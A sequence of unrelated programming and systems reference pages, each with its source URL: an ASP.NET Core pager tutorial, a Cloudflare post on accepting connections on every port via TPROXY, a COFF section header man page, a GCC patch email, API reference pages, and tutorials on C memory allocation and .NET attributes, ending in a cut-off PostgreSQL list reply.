Whenever we deal with data we need some mechanism for paging it. It makes it easier for users to navigate through data and, at the same time, we don't put too much load on our systems. This blog post shows how to build a pager for an ASP.NET Core site using a ViewComponent and the PagedResult class.

Source code available! A Visual Studio solution demonstrating paging with Entity Framework Core and NHibernate on ASP.NET Core is available at my Github repository gpeipman/DotNetPaging. Samples include LINQ, ICriteria and QueryOver paging methods and UI components.

PagedResult revisited

Some time ago I wrote the blog post Returning paged results from repositories using PagedResult, where I showed how to build a generic paged result class that you can put in the infrastructure layer or some widely used library in your system. As this class doesn't have any dependencies coming in from other parts of your system, you can use it with practically all kinds of data. Over time I have made some modifications to this class and refactored it, but for the most part it's still the same.

public abstract class PagedResultBase
{
    public int CurrentPage { get; set; }
    public int PageCount { get; set; }
    public int PageSize { get; set; }
    public int RowCount { get; set; }

    public int FirstRowOnPage
    {
        get { return (CurrentPage - 1) * PageSize + 1; }
    }

    public int LastRowOnPage
    {
        get { return Math.Min(CurrentPage * PageSize, RowCount); }
    }
}

public class PagedResult<T> : PagedResultBase where T : class
{
    public IList<T> Results { get; set; }

    public PagedResult()
    {
        Results = new List<T>();
    }
}

I separated the paging information and the data container into separate classes that are bound to each other through inheritance. The concept of PagedResult, which is what calling code actually uses, is good because you can take this class to all flavours of .NET.

NB! To see some real code that uses the PagedResult class, please refer to my blog post Returning paged results from repositories using PagedResult.
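The row-range arithmetic baked into PagedResultBase is easy to check by hand. A sketch of the same formulas (in Python, just for illustration — note that PageCount is populated by the query code in the original post; ceiling division is the usual way to derive it):

```python
import math

def page_info(current_page, page_size, row_count):
    """Mirror of PagedResultBase's computed properties."""
    page_count = math.ceil(row_count / page_size)
    first_row = (current_page - 1) * page_size + 1
    last_row = min(current_page * page_size, row_count)  # clamp on the final page
    return page_count, first_row, last_row
```

For example, with 95 rows at 10 per page, page 10 covers rows 91 to 95 — the min() clamp is what keeps the last page from overshooting RowCount.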
Although this post uses the single-class version of PagedResult, it's still valid in the context of this post.

Building pager view component

Now let's build an ASP.NET MVC view component to display paged results. View components are like a replacement for child actions. They have their own classes and views, and they also support dependency injection. Usually I put the code part of view components in the Extensions folder of my web application or web utilities project. Here is the code part of the pager view component.

public class PagerViewComponent : ViewComponent
{
    public Task<IViewComponentResult> InvokeAsync(PagedResultBase result)
    {
        return Task.FromResult((IViewComponentResult)View("Default", result));
    }
}

You can add an Invoke() method instead of the asynchronous one, but remember one thing: a component can't have both methods at the same time. As I'm currently writing this code on ASP.NET Core, I prefer asynchronous code. Now let's add the ViewComponent view to display data. Views of view components should be placed in the folder Views/Shared/Components/<ViewComponentName>. For the pager I have the folder Views/Shared/Components/Pager. Let's add a view called Default.cshtml to this folder.
@model PagedResultBase
@{
    var urlTemplate = Url.Action() + "?page={0}";
    var request = ViewContext.HttpContext.Request;
    foreach (var key in request.Query.Keys)
    {
        if (key == "page")
        {
            continue;
        }
        urlTemplate += "&" + key + "=" + request.Query[key];
    }

    var startIndex = Math.Max(Model.CurrentPage - 5, 1);
    var finishIndex = Math.Min(Model.CurrentPage + 5, Model.PageCount);
}

<div class="row">
    <div class="col-md-4 col-sm-4 items-info">
        Items @Model.FirstRowOnPage to @Model.LastRowOnPage of @Model.RowCount total
    </div>
    <div class="col-md-8 col-sm-8">
        @if (Model.PageCount > 1)
        {
            <ul class="pagination pull-right">
                <li><a href="@urlTemplate.Replace("{0}", "1")">«</a></li>
                @for (var i = startIndex; i <= finishIndex; i++)
                {
                    @if (i == Model.CurrentPage)
                    {
                        <li><span>@i</span></li>
                    }
                    else
                    {
                        <li><a href="@urlTemplate.Replace("{0}", i.ToString())">@i</a></li>
                    }
                }
                <li><a href="@urlTemplate.Replace("{0}", Model.PageCount.ToString())">»</a></li>
            </ul>
        }
    </div>
</div>

On my sample web project the pager looks like shown on the following screenshot. It's simple, it looks nice, and we didn't write much code to achieve output like this.

How it works?

Now you may ask how PagedResultBase can be enough for displaying a pager with links. And you have every right to be suspicious about the solution :) Actually, I use one simple trick here. All my paging scenarios follow the same simple pattern: paging is always done by the same controller action. I mean that search results are shown by the same controller action no matter what the results page index is. The same goes for product lists, manufacturer lists, etc. As the action for a given page of data is always the same, I can create a URL template for the pager. All I have to do is omit the parameter called "page", as this is the one that gets a new value for every page link.

Calling pager from views

Suppose you have a view where you display products by pages. As a model you use PagedResult<Product>. To display the pager you add the following line to the view.
@(await Component.InvokeAsync<PagerViewComponent>(Model))

This line displays the pager using the pager view component. An example of the pager is in the bottom left corner of my beer store demo application screenshot.

Wrapping up

PagedResult<T> is a pretty good construct for supporting paging. It has no dependencies on other layers and is therefore easy to use across all the different .NET frameworks. Using view components it was easy to build a generic pager component that can be used in all views that need paging. As the pager mark-up is held in a regular view file, it is easy to change the output if needed.

3 thoughts on "Building pager view component"

At last, I find a blog where described Pager view component very easily. I think this is a very important post for the beginner's learners. I try to find Pager view component related post since last month but finally I find your blog. thanks for sharing, if I need some help about this code I know you will be kind, Thank you so much. :)

It doesn't make much sense to use a ViewComponent to render a pager. A tag helper-based solution seems far more preferable to me.

I will add tag-helper based pager to this public solution: Thanks for advice, Paul!
https://gunnarpeipman.com/aspnet/pager-view-component/
Today we are introducing Spectrum: a new Cloudflare feature that brings DDoS protection, load balancing, and content acceleration to any TCP-based protocol. CC BY-SA 2.0 image by Staffan Vilcans Soon after we started building Spectrum, we hit a major technical obstacle: Spectrum requires us to accept connections on any valid TCP port, from 1 to 65535. On our Linux edge servers it’s impossible to “accept inbound connections on any port number”. This is not a Linux-specific limitation: it’s a characteristic of the BSD sockets API, the basis for network applications on most operating systems. Under the hood there are two overlapping problems that we needed to solve in order to deliver Spectrum: - how to accept TCP connections on all port numbers from 1 to 65535 - how to configure a single Linux server to accept connections on a very large number of IP addresses (we have many thousands of IP addresses in our anycast ranges) Assigning millions of IPs to a server Cloudflare’s edge servers have an almost identical configuration. In our early days, we used to assign specific /32 (and /128) IP addresses to the loopback network interface[1]. This worked well when we had dozens of IP addresses, but failed to scale as we grew. Along came the “AnyIP” trick. AnyIP allows us to assign whole IP prefixes (subnets) to the loopback interface, expanding from specific IP addresses. There is already common use of AnyIP: your computer has 127.0.0.0/8 assigned to the loopback interface. From the point of view of your computer, all IP addresses from 127.0.0.1 to 127.255.255.254 belong to the local machine. This trick is applicable to more than the 127.0.0.1/8 block. 
To treat the whole range of 192.0.2.0/24 as assigned locally, run:

ip route add local 192.0.2.0/24 dev lo

Following this, you can bind to port 8080 on one of these IP addresses just fine:

nc -l 192.0.2.1 8080

Getting IPv6 to work is a bit harder:

ip route add local 2001:db8::/64 dev lo

Sadly, you can't just bind to these attached v6 IP addresses like in the v4 example. To get this working you must use the IP_FREEBIND socket option, which requires elevated privileges. For completeness, there is also a sysctl net.ipv6.ip_nonlocal_bind, but we don't recommend touching it. This AnyIP trick allows us to have millions of IP addresses assigned locally to each server:

$ ip addr show
1: lo: mtu 65536
    inet 1.1.1.0/24 scope global lo
       valid_lft forever preferred_lft forever
    inet 104.16.0.0/16 scope global lo
       valid_lft forever preferred_lft forever
    ...

Binding to ALL ports

The second major issue is the ability to open TCP sockets for any port number. In Linux, and generally in any system supporting the BSD sockets API, you can only bind to a specific TCP port number with a single bind system call. It's not possible to bind to multiple ports in a single operation. A naive solution would be to bind 65535 times, once for each of the 65535 possible ports. Indeed, this could have been an option, but with terrible consequences: internally, the Linux kernel stores listening sockets in a hash table indexed by port numbers, LHTABLE, using exactly 32 buckets:

/* Yes, really, this is all you need. */
#define INET_LHTABLE_SIZE 32

Had we opened 65k ports, lookups to this table would slow drastically: each hash table bucket would contain two thousand items. Another way to solve our problem would be to use iptables' rich NAT features: we could rewrite the destination of inbound packets to some specific address/port, and our application would bind to that. We didn't want to do this though, since it requires enabling the iptables conntrack module.
Historically we found some performance edge cases, and conntrack cannot cope with some of the large DDoS attacks that we encounter. Additionally, with the NAT approach we would lose destination IP address information. To remediate this, there exists a little-known SO_ORIGINAL_DST socket option, but the code doesn't look encouraging.

Fortunately, there is a way to achieve our goals that does not involve binding to all 65k ports or using conntrack.

Firewall to the rescue

Before we go any further, let's revisit the general flow of network packets in an operating system. Commonly, there are two distinct layers in the inbound packet path:

- IP firewall
- network stack

These are conceptually distinct. The IP firewall is usually a stateless piece of software (let's ignore conntrack and IP fragment reassembly for now). The firewall analyzes IP packets and decides whether to ACCEPT or DROP them. Please note: at this layer we are talking about packets and port numbers – not applications or sockets.

Then there is the network stack. This beast maintains plenty of state. Its main task is to dispatch inbound IP packets into sockets, which are then handled by userspace applications. The network stack manages abstractions which are shared with userspace. It reassembles TCP flows, deals with routing, and knows which IP addresses are local.

The magic dust

Source: still from YouTube

At some point we stumbled upon the TPROXY iptables module. The official documentation is easy to overlook: TPROXY. Another piece of documentation can be found in the kernel. The more we thought about it, the more curious we became… So… What does TPROXY actually do?

Revealing the magic trick

The TPROXY code is surprisingly trivial:

case NFT_LOOKUP_LISTENER:
    sk = inet_lookup_listener(net, &tcp_hashinfo, skb,
                              ip_hdrlen(skb) + __tcp_hdrlen(tcph),
                              saddr, sport, daddr, dport,
                              in->ifindex, 0);

Let me read this out loud for you: in an iptables module, which is part of the firewall, we call inet_lookup_listener.
This function takes a src/dst port/IP 4-tuple, and returns the listening socket that is able to accept that connection. This is a core functionality of the network stack's socket dispatch. Once again: firewall code calls a socket dispatch routine.

Later on TPROXY actually does the socket dispatch:

skb->sk = sk;

This line assigns a socket struct sock to an inbound packet – completing the dispatch.

Pulling the rabbit from the hat

CC BY-SA 2.0 image by Angela Boothroyd

Armed with TPROXY, we can perform the bind-to-all-ports trick very easily. Here's the configuration:

# Set 192.0.2.0/24 to be routed locally with AnyIP.
# Make it explicit that the source IP used for this network
# when connecting locally should be in 127.0.0.0/8 range.
# This is needed since otherwise the TPROXY rule would match
# both forward and backward traffic. We want it to catch
# forward traffic only.
sudo ip route add local 192.0.2.0/24 dev lo src 127.0.0.1

# Set the magical TPROXY routing
sudo iptables -t mangle -I PREROUTING \
    -d 192.0.2.0/24 -p tcp \
    -j TPROXY --on-port=1234 --on-ip=127.0.0.1

In addition to setting this in place, you need to start a TCP server with the magical IP_TRANSPARENT socket option. Our example below needs to listen on tcp://127.0.0.1:1234. The man page for IP_TRANSPARENT shows:

IP_TRANSPARENT (since Linux 2.6.24)
    Setting this boolean option enables transparent proxying on this socket. This socket option allows the calling application to bind to a nonlocal IP address and operate both as a client and a server with the foreign address as the local endpoint. NOTE: this requires that routing be set up in a way that packets going to the foreign address are routed through the TProxy box (i.e., the system hosting the application that employs the IP_TRANSPARENT socket option). Enabling this socket option requires superuser privileges (the CAP_NET_ADMIN capability).

    TProxy redirection with the iptables TPROXY target also requires that this option be set on the redirected socket.
Here's a simple Python server:

import socket

IP_TRANSPARENT = 19

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.setsockopt(socket.IPPROTO_IP, IP_TRANSPARENT, 1)

s.bind(('127.0.0.1', 1234))
s.listen(32)
print("[+] Bound to tcp://127.0.0.1:1234")
while True:
    c, (r_ip, r_port) = s.accept()
    l_ip, l_port = c.getsockname()
    print("[ ] Connection from tcp://%s:%d to tcp://%s:%d" % (r_ip, r_port, l_ip, l_port))
    c.send(b"hello world\n")
    c.close()

After running the server you can connect to it from arbitrary IP addresses:

$ nc -v 192.0.2.1 9999
Connection to 192.0.2.1 9999 port [tcp/*] succeeded!
hello world

Most importantly, the server will report that the connection was indeed directed to 192.0.2.1 port 9999, even though nobody actually listens on that IP address and port:

$ sudo python3 transparent2.py
[+] Bound to tcp://127.0.0.1:1234
[ ] Connection from tcp://127.0.0.1:60036 to tcp://192.0.2.1:9999

Tada! This is how to bind to any port on Linux, without using conntrack.

That's all folks

In this post we described how to use an obscure iptables module, originally designed to help transparent proxying, for something slightly different. With its help we can perform things we thought impossible using the standard BSD sockets API, avoiding the need for any custom kernel patches.

The TPROXY module is very unusual – in the context of the Linux firewall it performs things typically done by the Linux network stack. The official documentation is rather lacking, and I don't believe many Linux users understand the full power of this module. It's fair to say that TPROXY allows our Spectrum product to run smoothly on the vanilla kernel. It's yet another reminder of how important it is to try to understand iptables and the network stack!

Doing low level socket work sounds interesting? Join our world famous team in London, Austin, San Francisco, Champaign and our elite office in Warsaw, Poland.
VISIT THE SOURCE ARTICLE Abusing Linux’s firewall: the hack that allowed us to build Spectrum
https://networkfights.com/2018/04/12/abusing-linuxs-firewall-the-hack-that-allowed-us-to-build-spectrum/
#include <scnhdr.h>

Every object file has a group of section headers to specify the layout of the data within the file. Each section within an object file has its own header. The C structure is as follows:

struct scnhdr {
    char           s_name[8];   /* section name */
    long           s_paddr;     /* physical address, aliased s_nlib */
    long           s_vaddr;     /* virtual address */
    long           s_size;      /* section size */
    long           s_scnptr;    /* file ptr to raw data for section */
    long           s_relptr;    /* file ptr to relocation */
    long           s_lnnoptr;   /* special purpose */
    unsigned short s_nreloc;    /* number of reloc entries */
    unsigned short s_nlnno;     /* unused */
    int            s_flags;     /* flags */
};

File pointers are byte offsets into the file; they can be used as the offset in a call to FSEEK (see ldfcn(4)). If a section is initialized, the file contains the actual bytes. An uninitialized section is somewhat different. It has a size, symbols defined in it, and symbols that refer to it. But it can have no relocation entries or data. Consequently, an uninitialized section has no raw data in the object file, and the values for s_scnptr, s_relptr, and s_nreloc are zero.

The entries that refer to line numbers (s_lnnoptr and s_nlnno) are not related to line number information. See the header file sym.h for the entries to get to the line number table. The entries that were for line numbers are reserved and should be set to zero.

The number of relocation entries for a section is found in the s_nreloc field of the section header. Being a `C' language short, this field can overflow with large objects. If this field overflows, the section header s_flags field has the S_NRELOC_OVFL bit set. In this case, the true number of relocation entries is found in the r_vaddr field of the first relocation entry for that section. That relocation entry has a type of R_ABS, so it is ignored when the relocation takes place.

ld(1), fseek(3), a.out(4), reloc(4).
http://backdrift.org/man/tru64/man4/scnhdr.4.html
This is the mail archive of the gcc-patches@gcc.gnu.org mailing list for the GCC project.

On Fri, Mar 16, 2001 at 07:51:07AM -0800, H . J . Lu wrote:
> On Fri, Mar 16, 2001 at 12:01:31PM +0100, Jakub Jelinek wrote:
> > Hi!
> >
> > As result of recent atexit changes in glibc using atexit in i386-linux
> > crtendS.o is bad (since if the shared library does not use atexit, it won't
> > be taken from libc_nonshared and shared library will thus end up with
> > non-versioned atexit reference).
> > According to H.J., this kludge was needed only for very very old Linux C
> > libraries and can be safely killed.
> > Ok to commit?
>
> How about this patch? The old libc still needs it.

In that case, isn't it better to move it out of crtstuff.c into target headers?

2001-03-16  Jakub Jelinek  <jakub@redhat.com>

	* crtstuff.c (init_dummy): Use CRT_END_INIT_DUMMY if defined.
	Remove ia32 linux PIC kludge and move it...
	* config/i386/linux.h (CRT_END_INIT_DUMMY): ...here.

--- gcc/config/i386/linux.h.jj	Mon Mar 12 11:45:15 2001
+++ gcc/config/i386/linux.h	Fri Mar 16 18:52:31 2001
@@ -170,3 +170,21 @@ Boston, MA 02111-1307, USA.  */
     }						\
   } while (0)
 #endif
+
+#if defined(__PIC__) && defined (USE_GNULIBC_1)
+/*. */
+
+#define CRT_END_INIT_DUMMY		\
+  do					\
+    {					\
+      extern void *___brk_addr;		\
+      extern char **__environ;		\
+					\
+      ___brk_addr = __environ;		\
+      atexit (0);			\
+    }					\
+  while (0)
+#endif
--- gcc/crtstuff.c.jj	Thu Mar 15 10:55:50 2001
+++ gcc/crtstuff.c	Thu Mar 15 11:04:03 2001
@@ -414,20 +414,8 @@ init_dummy (void)
   (0);
- }
+#ifdef CRT_END_INIT_DUMMY
+  CRT_END_INIT_DUMMY;
 #endif
 }

	Jakub
http://gcc.gnu.org/ml/gcc-patches/2001-03/msg01187.html
Interface for a seekable & readable data stream. More...

#include <stream.h>

List of all members.

Interface for a seekable & readable data stream.

Definition at line 571 of file stream.h.

Print a hexdump of the stream while maintaining position. The number of bytes per line is customizable.

Definition at line 261 of file stream.cpp.

[pure virtual] Obtains the current value of the stream position indicator of the stream.

Implemented in Common::MemoryReadStream, Common::SeekableSubReadStream, Common::GZipReadStream, Grim::PatchedFile, and Grim::PackFile.

[virtual] Reads at most one less than the number of characters specified by bufSize from the stream and stores them in the string buf. Reading stops when the end of a line is reached (CR, CR/LF or LF), and at end-of-file or error. The newline, if any, is retained (CR and CR/LF are translated to LF = 0xA = '\n'). If any characters are read and there is no error, a '\0' character is appended to end the string. Upon successful completion, return a pointer to the string. If end-of-file occurs before any characters are read, returns NULL and the buffer contents remain unchanged. If an error occurs, returns NULL and the buffer contents are indeterminate. This method does not distinguish between end-of-file and error; callers must use err() or eos() to determine which occurred.

Definition at line 127 of file stream.cpp.

Reads a full line and returns it as a Common::String. Reading stops when the end of a line is reached (CR, CR/LF or LF), and at end-of-file or error. Upon successful completion, return a string with the content of the line, *without* the end of a line marker. This method does not indicate whether an error occurred. Callers must use err() or eos() to determine whether an exception occurred.

Definition at line 190 of file stream.cpp.

Sets the stream position indicator for the stream (using whence values such as SEEK_SET). A successful call to the seek() method clears the end-of-file indicator for the stream.

Obtains the total size of the stream, measured in bytes.
If this value is unknown or cannot be computed, -1 is returned. [inline, virtual] TODO: Get rid of this??? Or keep it and document it. Definition at line 611 of file stream.h.
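The CR / CR-LF / LF handling documented above can be sketched in portable C++. This is an illustration of the documented semantics only, not the actual ResidualVM implementation; the function name is made up:

```cpp
#include <cassert>
#include <istream>
#include <sstream>
#include <string>

// Reads one line from a stream, translating CR and CR/LF line endings
// to a single '\n', as the readLine() documentation describes.
// Returns false if EOF was hit before anything could be read.
bool readLineLF(std::istream &in, std::string &out) {
    out.clear();
    int c = in.get();
    if (c == EOF)
        return false;
    for (; c != EOF; c = in.get()) {
        if (c == '\r') {                 // CR or CR/LF -> LF
            if (in.peek() == '\n')
                in.get();                // swallow the LF of a CR/LF pair
            out.push_back('\n');
            break;
        }
        out.push_back(static_cast<char>(c));
        if (c == '\n')                   // bare LF ends the line too
            break;
    }
    return true;
}
```

For example, the input "a\r\nb\rc\n" yields the lines "a\n", "b\n" and "c\n", each with its line ending normalized to LF.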
https://doxygen.residualvm.org/d3/d59/classCommon_1_1SeekableReadStream.html
bt_ldev_invoke_decode_event()

This function is used to parse the Bluetooth event data received over the invoke interface when "bb.action.bluetooth.EVENT" occurs.

Synopsis:

#include <btapi/btdevice.h>

int bt_ldev_invoke_decode_event(const char *invoke_data,
                                int invoke_len,
                                int *event,
                                const char **bdaddr,
                                const char **event_data)

Since: BlackBerry 10.3.0

Arguments:

- invoke_data: The data provided by the invoke interface.
- invoke_len: The length of the data provided by the invoke interface.
- event: Returns the event which triggered the invoke.
- bdaddr: A pointer to the Bluetooth address of the event from within the invoke data. This pointer is valid only for the lifespan of the invoke data.
- event_data: A pointer to the event data from within the invoke data. This pointer is valid only for the lifespan of the invoke data.

Library: libbtapi (For the qcc command, use the -l btapi option to link against this library)

Description: The data that is provided must have the mime-type of "application/vnd.blackberry.bluetooth.event". You must call bt_device_init() before calling this function.

Returns:

- EAGAIN: bt_device_init() was not called.
- EPROTO: The data provided is not properly formatted to the required mime-type.
- EINVAL: One or more of the variables provided are invalid.
- ESRVRFAULT: An internal error has occurred.

Last modified: 2014-05-14
https://developer.blackberry.com/native/reference/core/com.qnx.doc.bluetooth.lib_ref/topic/bt_ldev_invoke_decode_event.html
Embedded and other low-memory footprint applications need to be easy on the amount of memory they use when executing. In such scenarios, statically sized data types and data structures just are not going to solve your problem. The best way to achieve this is by allocating memory for variables at runtime under your watchful eye. This way your program is not using more memory than it has to at any given time. However, it is important to note that the amount of memory that can be allocated by a call to any of these functions is different on every operating system.

Dynamic Memory Allocation

malloc, calloc, and realloc are the three functions used to manipulate memory. These commonly used functions are available through the stdlib library so you must include this library in order to use them. After including the stdlib library you can use the malloc, calloc, or realloc functions to manipulate chunks of memory for your variables.

Dynamic Memory Allocation Process

When a program executes, the operating system gives it a stack and a heap to work with. The stack is where functions and their locally defined variables reside (global and static variables live in separate data segments). The heap is a free section for the program to use for allocating memory at runtime.

Allocating a Block of Memory

Use the malloc function to allocate a block of memory for a variable. If there is not enough memory available, malloc will return NULL. The prototype for malloc is:

void *malloc(size_t size);

Do not worry about working out the size of your variable: there is a nice and convenient operator that will find it for you, called sizeof. Most calls to malloc will look like the following example:

ptr = (struct mystruct*)malloc(sizeof(struct mystruct));

This way you can get memory for your structure variable without having to know exactly how much to allocate for all its members as well.
Allocating Multiple Blocks of Memory

You can also ask for multiple blocks of memory with the calloc function:

void *calloc(size_t num, size_t size);

If you want to allocate a block for a 10 char array, you can do this:

char *ptr;
ptr = (char *)calloc(10, sizeof(char));

The above code will give you a chunk of memory the size of 10 chars, and the ptr variable would be pointing to the beginning of the memory chunk. If the call fails, ptr would be NULL.

Releasing the Used Space

All calls to the memory allocating functions discussed here need to have the memory explicitly freed when no longer in use to prevent memory leaks. Just remember that for every call to an *alloc function you must have a corresponding call to free. The function call to explicitly free the memory is very simple and is written as shown here below:

free(ptr);

Just pass this function the pointer to the variable you want to free and you are done.

To Alter the Size of Allocated Memory

Let's get to that third memory allocation function, realloc.

void *realloc(void *ptr, size_t size);

Pass this function the pointer to the memory you want to resize and the new size. Here is a simple and trivial example to give you a quick idea of how you might see calloc and realloc in action. You will have many chances for malloc viewing as it is the most popular of the three by far.

allocation.c:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    char *ptr, *retval;

    ptr = (char *)calloc(10, sizeof(char));
    if (ptr == NULL)
        printf("calloc failed\n");
    else
        printf("calloc successful\n");

    retval = realloc(ptr, 5);
    if (retval == NULL) {
        printf("realloc failed\n");
        free(ptr);      /* on failure the original block is still ours */
    } else {
        printf("realloc successful\n");
        free(retval);   /* on success the old pointer may be stale,
                           so free only through the new pointer */
    }
    return 0;
}

First we declared two pointers and allocated a block of memory the size of 10 chars for ptr using the calloc function. The second pointer retval is used for getting the return value from the call to realloc. Note that after a successful realloc the old pointer may no longer be valid, so the block must be freed through whichever pointer currently owns it.
Then we reallocate the size of ptr to 5 chars instead of 10. After we check whether the call succeeded, we release the allocated memory. You can play around with the values of size passed to either of the memory allocation functions to see how big a chunk you can ask for before it fails on you. Do not worry, your operating system has the ability to keep your program in check, you will not hurt it this way. Here is the output:

~/Projects/C_tutorials/dynamic memory allocation/samples $ ./allocation
calloc successful
realloc successful
~/Projects/C_tutorials/dynamic memory allocation/samples $
https://www.exforsys.com/tutorials/c-language/dynamic-memory-allocation-in-c.html
Understanding .NET Attributes

Introduction

What are .NET Attributes?

A .NET attribute is a piece of information that you can attach to an assembly, class, property, method and other members. An attribute contributes to the metadata about an entity under consideration. An attribute is basically a class that is either inbuilt or developer defined. Once created, an attribute can be applied to various targets including the ones mentioned above. To understand this better, let's take an example. Consider the following piece of code:

[WebService]
public class WebService1 : System.Web.Services.WebService
{
    [WebMethod]
    public string HelloWorld()
    {
        return "Hello World";
    }
}

Attributes can be broadly classified into two types - inbuilt and custom. The inbuilt attributes are provided by .NET framework and you can readily use them whenever required. Custom attributes are developer defined classes. You will learn to create custom attributes later in this article.

If you observe a newly created project in Visual Studio, you will find a file named AssemblyInfo.cs. This file houses attributes that are applicable to the entire project assembly. There are many attributes such as AssemblyTitle, AssemblyDescription and AssemblyVersion. Since their target is the underlying assembly, they use [assembly: <attribute_name>] syntax. Information about the attributes can be obtained through reflection. Most of the inbuilt attributes are handled by .NET framework internally but for custom attributes you may need to devise a mechanism to observe the metadata emitted by them. You will see an example of this in later sections of this article.

Using Inbuilt Attributes

Now that you have some understanding of .NET attributes, let's see a more real world case where attributes are used. In this section you will use Data Annotation Attributes to validate model data. Begin by creating a new ASP.NET MVC Web Application.
Then add a class to the Models folder and name it as Customer. The Customer class contains just two public properties and is shown below:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.ComponentModel.DataAnnotations;

namespace CustomAttributesMVCDemo.Models
{
    public class Customer
    {
        [Required]
        public string CustomerID { get; set; }

        [Required]
        [StringLength(20, MinimumLength=5, ErrorMessage="Invalid company name!")]
        public string CompanyName { get; set; }
    }
}

Notice the above code carefully. The Customer class consists of two string properties - CustomerID and CompanyName. What is more important for us is that these properties are decorated with data annotation attributes residing in the System.ComponentModel.DataAnnotations namespace. The [Required] attribute indicates that the CustomerID property must be assigned some value in order to consider it to be a valid model. Similarly, the CompanyName property is decorated with [Required] and [StringLength] attributes. The [StringLength] attribute is used to specify that the CompanyName should be a minimum five characters long and maximum twenty characters long. An error message is also specified in case the value assigned to the CompanyName property doesn't meet the criteria. Note that [Required] and [StringLength] attributes are actually classes - RequiredAttribute and StringLengthAttribute - defined in the System.ComponentModel.DataAnnotations namespace. The MinimumLength and ErrorMessage are the properties of StringLength class and they are set as shown above.
Now, add the HomeController class to the Controllers folder and write the following action methods:

public ActionResult Index()
{
    return View();
}

public ActionResult ProcessForm()
{
    Customer obj = new Customer();
    bool flag = TryUpdateModel(obj);
    if(flag)
    {
        ViewBag.Message = "Customer data received successfully!";
    }
    else
    {
        ViewBag.Message = "Customer data validation failed!";
    }
    return View("Index");
}

The Index() action method simply returns the Index view. The Index.cshtml consists of a simple <form> as shown below:

<form action="/home/processform" method="post">
    <span>Customer ID : </span>
    <input type="text" name="customerid" />
    <span>Company Name : </span>
    <input type="text" name="companyname" />
    <input type="submit" value="Submit" />
</form>
<strong>@ViewBag.Message</strong>
<strong>@Html.ValidationSummary()</strong>

The values entered in the customerid textbox and companyname textbox are submitted to the ProcessForm() action method. The ProcessForm() action method uses the TryUpdateModel() method to assign the properties of the Customer model with the form field values. The TryUpdateModel() method returns true if the model properties contain valid data as per the condition set by the data annotation attributes, otherwise it returns false. Accordingly, the Message property of the ViewBag is set to a message. The model errors are displayed on the page using the ValidationSummary() Html helper. Now, run the application and try submitting the form without entering a CompanyName value. The following figure shows how the error message is displayed:

Validation Error Message

Thus data annotation attributes are used by ASP.NET MVC to perform model validations.

Creating Custom Attributes

In the preceding example, you used some inbuilt attributes. In this section you will create a custom attribute and then use it in an application. For the sake of this example let's assume that you have developed a class library that contains some complex business processing.
You want this class library to be consumed only by those applications that have a valid license key supplied by you. You can devise a simple technique to accomplish this task.

Note: Remember that we are developing this example purely for the sake of demonstrating the usage of custom attributes. In a real world case you may resort to a more robust and professional licensing system.

Create a class library (LicenseKeyAttributeLib) and add the following attribute class to it:

[AttributeUsage(AttributeTargets.All)]
public class MyLicenseAttribute : Attribute
{
    public string Key { get; set; }
}

As you can see the MyLicenseAttribute class is created by inheriting it from the Attribute base class. The Attribute base class is provided by the .NET framework. By convention all the attribute classes end with "Attribute". However, while using these attributes you don't need to specify "Attribute". Thus MyLicenseAttribute class will be used as [MyLicense] on the target. The MyLicenseAttribute class contains just one property - Key - that represents a license key. The MyLicenseAttribute itself is decorated with an inbuilt attribute - [AttributeUsage]. The [AttributeUsage] attribute is used to set the target for the custom attribute being created. A value of AttributeTargets.All means that MyLicenseAttribute can be applied to any entity (assembly, class, method etc.). You can use various members of the AttributeTargets enumeration to narrow down the target of the custom attribute.

Now, add another class library to the same solution and name it ComplexClassLib. The ComplexClassLib represents the class library doing some complex task and consists of a class as shown below:

public class ComplexClass1
{
    public string ComplexMethodRequiringKey()
    {
        //some code goes here
        return "Hello World!";
    }
}

The ComplexMethodRequiringKey() method of the ComplexClass1 is supposed to be doing some complex operation. You will revisit this method shortly.

Using Custom Attributes

Next, add an ASP.NET Web Forms Application to the same solution. Refer both - LicenseKeyAttributeLib and ComplexClassLib - assemblies in the web application.
Then apply the custom attribute you created earlier. Open the AssemblyInfo.cs file from the web application and add the following code to it:

using System.Reflection;
...
using LicenseKeyAttributeLib;
...
[assembly: MyLicense(Key = "4fe29aba")]

The AssemblyInfo.cs file now uses the MyLicense custom attribute to specify a license key. Notice that although the attribute class name is MyLicenseAttribute, while using the attribute you just mention it as MyLicense.

Obtaining Attribute Information Using Reflection

So far so good. You created a custom attribute and you also used it in a web application. But what's the real use of this attribute? Where exactly is the license key being validated? That's the last piece of code you need to glue in this example. Open the ComplexClass1 from the ComplexClassLib project again. Refer the LicenseKeyAttributeLib assembly inside the ComplexClassLib project. Then modify the ComplexMethodRequiringKey() method as follows:

public string ComplexMethodRequiringKey()
{
    Assembly a = Assembly.GetCallingAssembly();
    MyLicenseAttribute attb = a.GetCustomAttribute<MyLicenseAttribute>();
    if(attb == null)
    {
        throw new Exception("You don't have a license key!");
    }
    else
    {
        //validate license key here
        //throw exception if invalid
    }
    return "Your license key is " + attb.Key;
}

The ComplexMethodRequiringKey() method is now modified to read the MyLicense attribute. This is done using reflection. The GetCallingAssembly() method of the Assembly class returns the Assembly that is currently calling the ComplexMethodRequiringKey() method. The code then uses the GetCustomAttribute() method to retrieve the MyLicenseAttribute information. If the calling assembly (the web application in this case) doesn't contain the [MyLicense] attribute then GetCustomAttribute() will return null. If so the code throws an exception. If the [MyLicense] attribute is applied to the calling assembly its license key can be retrieved using the Key property of the MyLicenseAttribute class.
Although the above code doesn't validate the license key as such, you can add such logic as per your requirement (see the comment placeholder in the code). Now run the web application and you should see the license key being outputted in the browser. Then remove the [MyLicense] attribute from the AssemblyInfo.cs file and run the application again. This time you will get an exception - "You don't have a license key!".

You Don't Have a License Key

Summary

Attributes allow you to add metadata to their target. The .NET framework provides several inbuilt attributes and you can also create your own. This article introduced you to .NET attributes. You learned to use inbuilt data annotation attributes to validate model data. You also created a custom attribute and used it to decorate an assembly. A custom attribute is a class usually derived from the Attribute base class. You can add members to the custom attribute class just like you do for any other class. You can also specify a target for the attribute class using the [AttributeUsage] attribute and the AttributeTargets enumeration.
http://www.codeguru.com/csharp/.net/understanding-.net-attributes.htm
On Wed, 2013-12-04 at 09:50 -0500, Stephen Frost wrote:
> > I still don't see that Extension Templates are all bad:
> > * They preserve the fact that two instances of the same extension
> > (e.g. in different databases) were created from the same template.
>
